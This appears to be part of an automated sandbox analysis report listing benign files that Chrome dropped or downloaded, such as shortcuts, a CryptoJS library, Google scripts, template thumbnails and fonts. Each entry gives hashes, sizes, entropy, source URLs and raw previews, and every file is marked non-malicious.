                                                                                                                                                                                                                                        SHA-256:81E5585F6BFF9D5E66CA15B1C2F34539D910E8C756C4AD622CDEA32660F1D2AD
                                                                                                                                                                                                                                        SHA-512:373D4049A63AAA5DCD17C1B77AFFBB80F34761B465261FFFE5A84D5BC59344F9C8A0E0161A333567564297E59D0AB0221846366B22FDA9EDA0C7B4C29BD6DFCA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....|OGZ...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IeZ.]....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeZ.]....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeZ.]....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeZ.]..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeZ.]...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........O........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Mar 5 10:47:20 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                                        Entropy (8bit):3.9846577693906124
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8ldXTPvL5+HEidAKZdA1hehBiZUk1W1qehIy+C:8vzK9oy
                                                                                                                                                                                                                                        MD5:E8A7B34E1520A37C17E75B94AAD99773
                                                                                                                                                                                                                                        SHA1:5695341BECACCF6937B5B45C5E9B339E058DB09B
                                                                                                                                                                                                                                        SHA-256:65A2C43FE862F31A3999770B51E45BF479ACCF20F8A50A13FB9230A622FE7E76
                                                                                                                                                                                                                                        SHA-512:1F011520A6BB656ECA3CCEB4486B0B77769F875472F83D4A006BDA92A574E1D0EE96A828CCD614EB4F81C3D0C722A9DDF6A7A4729CDA860E8A2635A849593BEE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....&_Z...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IeZ.]....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeZ.]....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeZ.]....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeZ.]..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeZ.]...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........O........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Mar 5 10:47:20 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2683
                                                                                                                                                                                                                                        Entropy (8bit):3.997310001917334
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8ZdXTPvL5+HEidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbqy+yT+:8jzUT/TbxWOvTbqy7T
                                                                                                                                                                                                                                        MD5:2A5165CB6E3D31C9046D59C7189ED23E
                                                                                                                                                                                                                                        SHA1:866DCDA80CCF66F45CC6838A0368B915982E1CD8
                                                                                                                                                                                                                                        SHA-256:20B2CCD4A8E71768C40A64B0723031C69A5BCA8DA50926BD4B5C87BB1A185848
                                                                                                                                                                                                                                        SHA-512:6FAC8D77F7C5078306D6E0CDDF00482A94EF80D3D89E7514EBB0E985273202577F74400895051432DE72F5BE45488B5B9DC614163986B7B10E85B40BFE6B3184
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....q.;Z...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IeZ.]....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeZ.]....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeZ.]....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeZ.]..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeZ.]...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........O........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):48316
                                                                                                                                                                                                                                        Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1437)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):103047
                                                                                                                                                                                                                                        Entropy (8bit):5.479296079433312
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:u9vD7mVMyv6IlcRYyCnNJOC/O7P1Ul1PEG9Kc3YJG7RDljk7ww3w+h0W/v1DH94z:jMyvhJyj1UjPEWKcxUww3wM0W/N7941d
                                                                                                                                                                                                                                        MD5:12D19416A27EDA8569FC549B5497EA8A
                                                                                                                                                                                                                                        SHA1:EE44DC666D32B79A51074BA807B24B34D8D99383
                                                                                                                                                                                                                                        SHA-256:4FB5044054623AE074519C00337BB4A9BA835026041CE5B1795BB8A879D4F9D9
                                                                                                                                                                                                                                        SHA-512:8CED5136E0E502A327A10373AEC4F1BA72492E2E9EF5768337AA8A4ECEA11E925263D4E8114812DB1D3E2AB45EF7077F5E631BC223F116D8A988DFE6DEA37009
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0?le=scs
                                                                                                                                                                                                                                        Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var aa,ea,la,oa,ya,Ba,Ca;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.la=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.na=la(this);oa=function(a,b){if(b)a:{var c=_.na;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.oa("Symbol",function(a){if(a)return a;var b
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):96472
                                                                                                                                                                                                                                        Entropy (8bit):7.994641085316638
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:hjnFSSJ0UZNEYOHH0BCaQsxaQkBoUC1cQsOiI9LMO2BjPuotRtuXYip4I0eYK:hLM5+OHAxwlObtiId+Luk0oiyQYK
                                                                                                                                                                                                                                        MD5:C3C81A0C22638EC78A34B49C657FAD7A
                                                                                                                                                                                                                                        SHA1:4C154797AF266CDC1D82E8E59FC7A73BD9CC08F6
                                                                                                                                                                                                                                        SHA-256:E86C3985E0F3477EE7DE8CCD24961C96D5C84DDC7A3A130D9BBF2A0592E9E5F6
                                                                                                                                                                                                                                        SHA-512:B3E06A1F46094C8947D408EF5D3A6C259D784896DFC1CCB0529305877DC88AFF86CBD59CA473B87206095E09D01CDCF369D91FBE584741D0C8849396B7B0C98A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1GQCQ4J9jtsmwDWVpNf5YJIqiGDjl4LzJOuEky0Llkcc_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..x.IDATx......... ...9>!.)..).......`+,.a..g..fK...If...o.m.m.m.m....A..m.w?>.*g.S]]]....E..?....`M.....N*N...K$...$IZ.VCH!..]m....z.[{.U.......:....e.........j4.UUq..s.1n,....P.F..n&5..'.B...v:.!....(E....r.i...q.....k.*IX..g\r......6`..uY.0.....Q..........^}.G.*...k-.)._{.....!...6RE......X%././....{\.H.M....JU.J..(.`@.........o....\X.s......Lp.i6r.m...L..$.w.9.g......:Ui......6.i........D).....>v...'N..*@...gB2...k...6;.U.b!...c o..k...I.i...n..K|(...P7MS.x.4c.?.4......aW3S.|r.s...R.BP......(C.p.j~5..Kl2U..9}.!........4........A.&Db....P&.L.w.R.='.}_....9o.sY..Y.e .....{Fs.~...G.t..I....@........^"Q.@..`..).t.:.1Yj.M..[..1......<o.....k...........2.s&.). ..u:.lJ.p..?...4.P.;..e.)....v..L!......~.%\.E.].......M!.`4...l.a9.sF..W.2.F.E..GSNh.......>.m...s. .2...s/...G..<..Pw.qC.qQ.E.i7.M.RO....'.:........9..NQ..v..........|...<...."......m..2._.D..Z!u...Z4..Q....!....o4.N.3D.c:@....~..*GQ-...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2412)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):214843
                                                                                                                                                                                                                                        Entropy (8bit):5.526586363143379
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:5qq8srgb0hYTnZukAVa5OwOYCNwWlJ20IovucXBK28h8fFQP+nHmgLJcQ4zX+tee:5qqvrgb0hYTn5AVa5OwOYCNwWlJ20IoJ
                                                                                                                                                                                                                                        MD5:69C9B67FBDC3E9C35B6019A7833D71FC
                                                                                                                                                                                                                                        SHA1:B887F3FDA6C804FEBC784BA4254ECC1BF38EDF69
                                                                                                                                                                                                                                        SHA-256:696C29CC76CF7E0F505E3D610836BB555BCBBEC52031E4C5C09E14DBC8048514
                                                                                                                                                                                                                                        SHA-512:DB2372F3E022D8832277951825B4A85899A80FABA26D36AE218831B54518739366EF6B9495834C16A4BBD75FCE1576F2D8C777AAECBFA45A098F77BD84B311CE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.WcyoQrvsWY0.2019.O/rt=j/m=qabr,q_dnp,qcwid,qapid,qads,q_dg/exm=qaaw,qadd,qaid,qein,qhaw,qhba,qhbr,qhch,qhga,qhid,qhin/d=1/ed=1/rs=AA2YrTt0d-Ss5kisT1M_8rsOzCdvCZrVWg"
                                                                                                                                                                                                                                        Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.wd=typeof AsyncContext!=="undefined"&&typeof AsyncContext.Snapshot==="function"?a=>a&&AsyncContext.Snapshot.wrap(a):a=>a;.}catch(e){_._DumpException(e)}.try{._.pe=function(a){return _.Ib(a)&&a.nodeType==1};_.qe=function(a,b){if("textContent"in a)a.textContent=b;else if(a.nodeType==3)a.data=String(b);else if(a.firstChild&&a.firstChild.nodeType==3){for(;a.lastChild!=a.firstChild;)a.removeChild(a.lastChild);a.firstChild.data=String(b)}else _.me(a),a.appendChild(_.ce(a).createTextNode(String(b)))};var re;_.se=function(a,b,c){Array.isArray(c)&&(c=c.join(" "));const d="aria-"+b;c===""||c==void 0?(re||(re={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sort:"none",busy:!1,disabled:!1,hidden:!1,invalid:"false"}),c=re,b in c?a.setAttribute(d,c[b]):a.removeAttribute(d)):a.setAttribute(d,c)};var we;_.ve=func
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 72896, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):72896
                                                                                                                                                                                                                                        Entropy (8bit):7.99302309612498
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:l+/lJ4+lxFkpiySl5jIWJ2wLyusIoQh8TKiZeWwn483A16TMVo0MVuJ:SJ4+DFAPSDjb2wLuIOkRn483APDSy
                                                                                                                                                                                                                                        MD5:8AFBBEF49E32F6382F8C029DDA485679
                                                                                                                                                                                                                                        SHA1:2FBD600C537D820F23D492D907DAC0BD98F0778E
                                                                                                                                                                                                                                        SHA-256:D4C4F413055D77B989E4D3BCE7E3CBB45427F251387EABFF8F9709F4EE1B2BF0
                                                                                                                                                                                                                                        SHA-512:A18299FDA6BDDE29D6036FADE0A234205D8BAA352BC15BB4AA846730D367EEA737DBB625D65FC49414906B2431290C14AB79A1C36241A206FABF80CECE385D29
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/robotoserif/v15/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-JuqON8AA.woff2
                                                                                                                                                                                                                                        Preview:wOF2..............e(...\.................................4.`?STAT....P..............6.$.... ..x..g..[...e..c....Vl#Q.....hsH.-3......7:...........*..].....*u.....................%?"7......^.C.....A..jbl)...M..S>D.8.b...gl%g.Z.&\MHZW..{.p.....Y*i5..&....[.LI..ye.j...W.0.p...xR..!E....k.8...Y...+....[...!ye...o#.>....'.T..s.a4.[Lk.k!.*.....d..p.i....k....lF..5~Z..zJ..X.T..lB.1...(X..Uf.k...|K1:..6....a.*..3W......;SvG.J.@!./*..^....v.'N.sB...7..o...a6q.x@k..Z.E-!W..n.K.m'......eu1 7..lG".3......+.A.\.]r..wp.\.\.... 3..V!.x.BP.-+M..BR.N....^F..h.{..uas....0.....Xr...x...=.C....c.A..<.#...#*d.w...<.d........ .G5\m..0RNqivB.xwD...>2s.E.].u....3.....P..`...-..pJ...$Fg...+.1.L;[..s...6.(.Y.+!f..}d..DDh.].3yM*PN#3.}.p....P.8].g..-5OI...'..Il]i.D..oR.g+.+t..G..32..3O...../..I ..bk........(.\.O.....1..c.....Io....e....W...*.I.AG...r:.E.4.......M>.[....!.._.?:$......'.oS...Fw.-...L..J,.z.(......}k.l9._&./d5.l...Vm.z...=...~..D.I......r9..k.6..b...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1400)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22426
                                                                                                                                                                                                                                        Entropy (8bit):5.430162252927682
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:BzI83aaoRjuyMRPcmr6Y23yHWp0SGozyhUm5kUWCB4JM:ZdNbqDY23ZJGozyhFkw42
                                                                                                                                                                                                                                        MD5:01CB502F8BAB0ED7FB47546DD0DD0F48
                                                                                                                                                                                                                                        SHA1:1203C218DD21085E59797CF06E2D812F86116557
                                                                                                                                                                                                                                        SHA-256:4CB900BCB6F7018B7CCAFD0570D12080798275291C0F1DF73DD8EB80E0C9F5D9
                                                                                                                                                                                                                                        SHA-512:F7C6A8A0B7D64748B727AC0704C4CAB45A302A65B562658C2C59511D195B57264BABC554B1C3F874F416F199032B7D2F8DEF19749492812534D672EF08263E7E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:mK(m6a);.var yrw="C__HC_94253229",zrw="I__HC_94253229",Arw="No email data found in handlerInput for Events.Calendar: ",Brw="__HM_173584019",Crw="boqSocialpeoplehovercardV2HovercardAnimating",Drw="buganizer-system+",Erw="docsHeaderConfig",Frw="forceHide",Grw="hideTriggeredByMouse",Hrw="hovercardAlign",Irw="hovercardHoverTriggerDisabled",Jrw="hovercardOwnerId",Krw="this.el_ is falsy",Lrw="yaqs-carrier-pigeon+";WKe.prototype.UTa=X(948,gm(Mg));ZKe.prototype.UTa=X(947,function(a){ZKe.Uc.UTa.call(this,a);bLe(this)});.function Mrw(a){this.Fa=Q(a)}H(Mrw,S);function Nrw(a){this.Fa=Q(a)}H(Nrw,S);D=Nrw.prototype;D.getMetadata=function(){return R(this,Mrw,1)};D.getValue=function(){return qq(this,2)};D.setValue=function(a){return Qq(this,2,a)};D.getType=function(){return qq(this,3)};D.Ac=function(a){return Qq(this,3,a)};function Orw(a){this.Fa=Q(a)}H(Orw,S);Orw.prototype.getEmail=function(){return R(this,Nrw,1)};Orw.prototype.yu=function(){return Vp(this,Nrw,1)};function Prw(a){this.Fa=Q(a)}H(Prw,S
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):20484
                                                                                                                                                                                                                                        Entropy (8bit):7.954515339339692
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:rmBPkYA2QLj0e5sArInHMg9We8kMx6MLmnb7xBu62dg:rmBPT6v5PInHMgg1kMc7npBu63
                                                                                                                                                                                                                                        MD5:434BD6F6F73D221883B0E4E0ED37E6C7
                                                                                                                                                                                                                                        SHA1:0DC7020879DA3E1B20A74C2FB8F1BA427911E700
                                                                                                                                                                                                                                        SHA-256:23CD0CEA72AFE2179B5D20CFF006E6315F13F4EF105D74A94B9715F0697D813D
                                                                                                                                                                                                                                        SHA-512:846E0C5D62E69777B236D186E789EF8FF6003BC5502CA9934784D4045DBCB2A66E3420FAB95E4E0EF13133FBA52E0E0A1728E07C2DFB0B7922764E9242BBD7B5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1TsrfTHMRDDvqTLHAy28dNxxlpd-VetDKjL8g5EDzy3E_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..O.IDATx...A..... .[....n........a...@X..... ,@X..... ,.a............@X..... ,.........@X..... .....=..Sa8..@....P_ .D...Pd..V.A.(J...."%*T*.(T."J.`....o....#....{...1.C..z.V......X..$....~..X.m..6..t:...(.V+...|..F...fz.^..z.r<.M&S6.}.^V.5...t..t..l,.K,.3.....V..\...M.f3...N...|"......x.aJ..BD..".....B.\N&....l.X.L.../......F... .F....[.$...n.\.N.s0....|`J*..i...P..... (.W.....b.~..B.p8.NiPs......B...B.....[.......$.Xt`x........p8.s....'....R=..*.@.H.%.0.V.R....(.*../...q>.Y.Eg.\z.^.T.U...(u.......4..t.f3...ov...B(......1.....H..."- I.@@......P.$.*......F...~.C...:.R....u]>..+5.NQ.4M..^O.4.^;QQ.a......@..<....n..n`5M..9..,...,.m....EF;.......JQ...l..y....4....,r..#z.\!PH.;._..w.v..:.C.m.........{.....?t...,6V.....=.....&+.s].....2.SY.A......-.G.$z.....*...TU..H..."p..2..3M...\L...+.7..b.O....G.D.d(....x...v...$.a.~....%..#\.....(.....G{.c..=....l.*.K&{.*.e.....K{....q.+...~........K..."(......*._q..^...c$2...'...... X... X.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):76952
                                                                                                                                                                                                                                        Entropy (8bit):7.99204525207289
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:ITVSzmcj88NyQU9efFjLrU+tLPK+c0GhVA8zcZ5Lf5DoMqaul5V7/:Ih1cjxkQISrUiLJEQ7rqau/V7/
                                                                                                                                                                                                                                        MD5:35DA70DA36EE1912390FE4BF912B3153
                                                                                                                                                                                                                                        SHA1:2E68F9F890F06DF9AB8637072817A1EC22DC5160
                                                                                                                                                                                                                                        SHA-256:4E29C3B6FD9A45062E4431980FFAFEC4DCF0458718B03F96A7E6FC0942B60126
                                                                                                                                                                                                                                        SHA-512:6A49A0E89583D7CF76394581962606222A0265591D8B0A4B60FE00A621B7C4DE4695AFEA69965997F59EED56BBAADC0F885326406C142A0682BB68523F55B2AA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1aSU-MaeptjxAY921jvWQfraB-FedHZQvAQYdUjqEtj0_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..,_IDATx......... ....p..l5.........a...@X....P.....-...\..|@...g.9....'.|*..jK%..o.x.|...xYWl...<.m...u..R...}.#<.c..{...*.......K..|_.6.j.&.n.k.r."F.Z.."*..c.:.,^8k.{vdxD.W9.a...14..1....i]..\..Uo..R&.,Le..v..:."...n8.Q'q..}gTfq.^..<...v)3.xD..q..wd..i^8`..ZxY.d.@@Q.H.6....Xx.(*.......3N...a]..HrW..2.....s.=..^.. .D.{n..#Y#.V..if.. .v.s.<N?n7.R&TP$#A`..v0b.....GepM...g.l6"ov..!."mHL@.m8....!.5]......j....c......YV.R.]p......x.....h..J..1.5..V.p8.3....y.RE..89"..J....]a#....I^.W.yO..NW.L....#o....."..4..L+....m.....)s9.P..Ko......<y.ws......x~......0..:8..s..Q...iSY.5.:...,....."..\...lB..;.k.$.c.....D+.@TL%."i%..^.a......r...V......2C..0..Eu.).5.!:s...7e.k.b..,.-.\.4.-.O..i....d' *.yX...d.....EX<cY`.......OJ=3EEII.p...^.C.F.73.cj.{...~.....[...l.....o...r...<.o........b...8.$$A....7...B.S.c..T...`$x....F.tZ..:[...?...'i.h.Nm.i.x....t..|.]...4...W9,..O.....Yg...#..f....".\.Dv...f.....jT..C.&.m..v<.....]..|
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 65828, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):65828
                                                                                                                                                                                                                                        Entropy (8bit):7.994888729247966
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:jpUCPU80z/viwxp2ws/6HBRhRhKT7/wu7QlakYDFc2kN4B265:jpUcZQfx8w9hRhzKTJQXYDnHr5
                                                                                                                                                                                                                                        MD5:9187B9AF4CD2B2C0080F3E41671E52CF
                                                                                                                                                                                                                                        SHA1:50810C3D6D3F3AC2155409DEC18086ABC3E17E9C
                                                                                                                                                                                                                                        SHA-256:DDD58F9FE28DBDF8AA84F7F39DDDDEBB4CBFE5B0C74470ED72C7624C7742CC30
                                                                                                                                                                                                                                        SHA-512:B2AAAFEE669B48C2E66F3BC010CA7FBEE9B2E9B17B11B9BA619412777DBCC35B37F8F098F0F6001428877FB72B0072F451F51577E98D15FC9B00292DAAEA3541
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/robotoserif/v15/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-JuT-R8AA.woff2
